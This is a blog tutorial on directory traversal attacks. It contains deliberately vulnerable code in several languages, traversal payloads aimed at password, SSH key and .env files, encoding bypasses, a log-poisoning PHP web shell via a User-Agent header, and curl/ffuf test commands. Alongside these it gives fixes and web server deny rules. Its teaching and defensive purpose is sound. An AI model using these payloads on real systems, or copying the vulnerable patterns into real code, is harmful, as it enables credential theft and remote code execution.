Thilan Dissanayaka Application Security April 09, 2020

Directory Traversal Attacks

Directory traversal is one of those vulnerabilities that makes you wonder how it still exists. The concept is dead simple — you manipulate a file path to escape the intended directory and read (or write) files elsewhere on the filesystem. A few ../ sequences, and you’re reading /etc/passwd, application config files, or source code containing database credentials.

It’s been in the OWASP Top 10 forever (under “Broken Access Control”), it’s trivially easy to test for, and yet it keeps showing up — because developers keep building file paths from user input without validation.

How Directory Traversal Works

Filesystems are hierarchical. Every file has a path relative to the root:

/
├── etc/
│   ├── passwd
│   ├── shadow
│   └── hosts
├── var/
│   └── www/
│       └── html/
│           ├── index.php
│           ├── images/
│           │   ├── logo.png
│           │   └── banner.jpg
│           └── uploads/
└── home/
    └── thilan/

The .. notation means “go up one directory.” So if you’re in /var/www/html/images/ and you reference ../../, you end up at /var/www/. Chain enough ../ sequences and you reach the root — from there you can access anything the web server process has permission to read.

The attack targets any feature where user input is used to construct a file path:

Image/file viewers (?file=report.pdf)
File download endpoints (?download=document.docx)
Template/page includes (?page=about)
Language file loaders (?lang=en)

The Classic Example

A web application serves images through a PHP script:

<?php
$image = $_GET['image'];
$path = '/var/www/html/images/' . $image;

header('Content-Type: image/jpeg');
readfile($path);
?>

Normal use:

GET /view.php?image=logo.png
→ Reads: /var/www/html/images/logo.png  ✓

Attack:

GET /view.php?image=../../../../etc/passwd
→ Reads: /var/www/html/images/../../../../etc/passwd
→ Resolves to: /etc/passwd  ← Game over

The ../../../../ walks up four directories from /var/www/html/images/ to /, then descends into etc/passwd. The server happily reads the file and sends it back.

/var/www/html/images/  ← starting here
../                    → /var/www/html/
../                    → /var/www/
../                    → /var/
../                    → /
etc/passwd             → /etc/passwd

What Attackers Target

Once you can read arbitrary files, here’s what’s valuable:

Linux Systems

# System files
../../../../etc/passwd              # User accounts (always readable)
../../../../etc/shadow              # Password hashes (usually needs root)
../../../../etc/hosts               # Network configuration
../../../../proc/self/environ       # Environment variables (may contain secrets)
../../../../proc/self/cmdline       # How the process was started

# Application files
../../../../var/www/html/config.php  # Database credentials
../../../../var/www/html/.env        # Environment configuration
../../../../var/log/apache2/access.log  # Web server logs

# SSH keys
../../../../home/thilan/.ssh/id_rsa  # Private SSH key
../../../../root/.ssh/id_rsa         # Root's private SSH key

Windows Systems

..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\win.ini
..\..\..\..\inetpub\wwwroot\web.config   # IIS config with connection strings
..\..\..\..\users\administrator\.ssh\id_rsa

Note: Windows accepts both / and \ as path separators, which is important for bypass techniques.

Application Source Code

This is often more valuable than system files. Reading the application’s source code reveals:

Database credentials in config files
API keys and secrets
Business logic vulnerabilities
Other file paths to target
Internal API endpoints

Vulnerable Patterns Across Languages

PHP — File Inclusion

PHP’s include() and require() are especially dangerous because they don’t just read the file — they execute it as PHP code. This turns directory traversal into Remote Code Execution.

<?php
// VULNERABLE: Local File Inclusion (LFI)
$page = $_GET['page'];
include($page . '.php');
?>

GET /index.php?page=../../../../var/log/apache2/access

If the attacker can inject PHP code into the access log (via a crafted User-Agent header), the include() will execute it. This is the classic log poisoning technique.

# Step 1: Inject PHP into the access log via User-Agent
$ curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/

# Step 2: Include the log file (the .php extension is appended by the code)
GET /index.php?page=../../../../var/log/apache2/access&cmd=id

Python — Flask/Django

from flask import Flask, request, send_file

app = Flask(__name__)

@app.route('/download')
def download():
    filename = request.args.get('file')
    # VULNERABLE: User input directly in file path
    return send_file(f'/var/www/uploads/{filename}')

GET /download?file=../../../../etc/passwd

Node.js — Express

const express = require('express');
const path = require('path');
const fs = require('fs');

app.get('/files', (req, res) => {
    const filename = req.query.name;
    // VULNERABLE: Path concatenation with user input
    const filepath = path.join(__dirname, 'public', filename);
    res.sendFile(filepath);
});

GET /files?name=../../../../etc/passwd

Note: path.join() resolves .. sequences, so path.join('/app/public', '../../../../etc/passwd') returns /etc/passwd. It does NOT prevent traversal — it just normalizes the path.

Java — Servlet

@WebServlet("/download")
public class DownloadServlet extends HttpServlet {
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        String filename = request.getParameter("file");
        // VULNERABLE: Direct path concatenation
        File file = new File("/var/www/uploads/" + filename);

        FileInputStream fis = new FileInputStream(file);
        // ... stream file to response
    }
}

Bypass Techniques

Developers often implement naive filters that attackers can bypass:

Bypass 1: URL Encoding

If the application blocks ../ but doesn’t decode before checking:

%2e%2e%2f                  → ../
%2e%2e/                    → ../
..%2f                      → ../
%2e%2e%5c                  → ..\  (Windows)

Double encoding (if the server decodes twice):

%252e%252e%252f            → %2e%2e%2f → ../

Bypass 2: Null Byte (PHP < 5.3.4)

If the application appends an extension:

include($_GET['page'] . '.php');

The attacker uses a null byte to truncate the extension:

GET /index.php?page=../../../../etc/passwd%00
→ include('../../../../etc/passwd\0.php')
→ C function stops at \0 → reads /etc/passwd

This was fixed in PHP 5.3.4 but is still relevant for legacy applications.

Bypass 3: Path Truncation

On older Windows systems and some configurations, very long paths get truncated:

../../../../etc/passwd/./././././././././././././.  (repeat until path limit)

Bypass 4: Alternative Separators

Windows accepts multiple separators:

..\..\..\..\etc\passwd
....//....//....//etc/passwd
..\/..\/..\/etc/passwd

Bypass 5: Bypassing Prefix Checks

If the application checks that the path starts with the expected directory:

$path = '/var/www/uploads/' . $_GET['file'];
if (strpos($path, '/var/www/uploads/') === 0) {
    readfile($path);  // Still vulnerable!
}

The check passes because the path starts with /var/www/uploads/ — but after ../ resolution, it escapes:

/var/www/uploads/../../../../etc/passwd
→ starts with /var/www/uploads/ ✓ (check passes)
→ resolves to /etc/passwd (traversal succeeds)

Prevention

1. Use `basename()` — Strip the Path Entirely

The simplest and most effective fix: use basename() to extract just the filename, discarding any directory components.

<?php
$filename = basename($_GET['file']);  // "../../../../etc/passwd" → "passwd"
$path = '/var/www/uploads/' . $filename;

if (file_exists($path)) {
    readfile($path);
} else {
    echo "File not found";
}
?>

This is the nuclear option — it completely removes any directory traversal. Use it when the user should only specify a filename, never a path.

2. Validate with `realpath()` — Verify After Resolution

Resolve the full path and verify it’s within the expected directory:

<?php
$baseDir = '/var/www/uploads/';
$filename = $_GET['file'];

$fullPath = realpath($baseDir . $filename);
$realBase = realpath($baseDir);

// Check that:
// 1. realpath() succeeded (file exists)
// 2. The resolved path starts with our base directory
if ($fullPath !== false && strpos($fullPath, $realBase) === 0) {
    readfile($fullPath);
} else {
    http_response_code(403);
    echo "Access denied";
}
?>

This handles all bypass techniques — realpath() resolves ../, symlinks, URL encoding, and everything else to the actual filesystem path. Then we verify the result is within our allowed directory.

3. Whitelist / ID Mapping — Don’t Use Filenames at All

The most secure approach: never let users specify filenames. Use an ID that maps to a predefined file:

<?php
$fileMap = [
    '1' => '/var/www/uploads/report-q1.pdf',
    '2' => '/var/www/uploads/report-q2.pdf',
    '3' => '/var/www/uploads/brochure.pdf',
];

$id = $_GET['id'];

if (isset($fileMap[$id])) {
    readfile($fileMap[$id]);
} else {
    http_response_code(404);
    echo "File not found";
}
?>

No user-controlled path. No traversal possible. The attacker can only access files you explicitly listed.

4. Python — Secure Path Handling

import os
from flask import Flask, request, send_file, abort

app = Flask(__name__)
UPLOAD_DIR = '/var/www/uploads'

@app.route('/download')
def download():
    filename = request.args.get('file', '')

    # Resolve the full path
    full_path = os.path.realpath(os.path.join(UPLOAD_DIR, filename))

    # Verify it's within the upload directory
    if not full_path.startswith(os.path.realpath(UPLOAD_DIR)):
        abort(403)

    if not os.path.isfile(full_path):
        abort(404)

    return send_file(full_path)

5. Node.js — Secure Path Handling

const path = require('path');
const fs = require('fs');

const UPLOAD_DIR = path.resolve(__dirname, 'uploads');

app.get('/files', (req, res) => {
    const filename = req.query.name;
    const fullPath = path.resolve(UPLOAD_DIR, filename);

    // Verify the resolved path is within our directory
    if (!fullPath.startsWith(UPLOAD_DIR)) {
        return res.status(403).send('Access denied');
    }

    if (!fs.existsSync(fullPath)) {
        return res.status(404).send('Not found');
    }

    res.sendFile(fullPath);
});

The pattern is the same in every language: resolve the full path, then verify it’s within the allowed directory.

6. Web Server Configuration

As an additional layer, configure your web server to restrict file access:

# Nginx — restrict access to sensitive files
location ~ /\. {
    deny all;  # Block dotfiles (.env, .git, .htaccess)
}

location ~* \.(conf|ini|log|sh|sql)$ {
    deny all;  # Block sensitive file extensions
}

# Apache — same in .htaccess
<FilesMatch "\.(conf|ini|log|sh|sql|env)$">
    Require all denied
</FilesMatch>

Testing for Directory Traversal

Manual Testing

# Basic traversal
curl "http://target.com/view?file=../../../../etc/passwd"

# URL encoded
curl "http://target.com/view?file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"

# Double encoded
curl "http://target.com/view?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd"

# Null byte (legacy PHP)
curl "http://target.com/view?file=../../../../etc/passwd%00"

# Windows paths
curl "http://target.com/view?file=..\..\..\..\windows\win.ini"

With Burp Suite

Intruder with a wordlist of traversal payloads is the fastest approach. The dotdotpwn wordlist covers hundreds of encoding variations.

Automated

# Using ffuf with a traversal wordlist
$ ffuf -u "http://target.com/view?file=FUZZ" -w traversal-payloads.txt -mc 200

# Using dotdotpwn
$ dotdotpwn -m http -h target.com -f /etc/passwd

Final Thoughts

Directory traversal is a solved problem from a technical standpoint. The fix is well-known: resolve the path, validate it’s within the allowed directory. realpath() + prefix check, or basename(), or ID mapping — pick any of them and the vulnerability disappears.

Yet it keeps showing up in production code because developers build file paths from user input without thinking about it. Every open(), include(), readfile(), send_file(), or readFileSync() that touches user input is a potential traversal point.

The mental model is simple: never trust a user-controlled path. Validate it after resolution, not before. And when possible, don’t use paths at all — use IDs that map to files server-side.

Thanks for reading!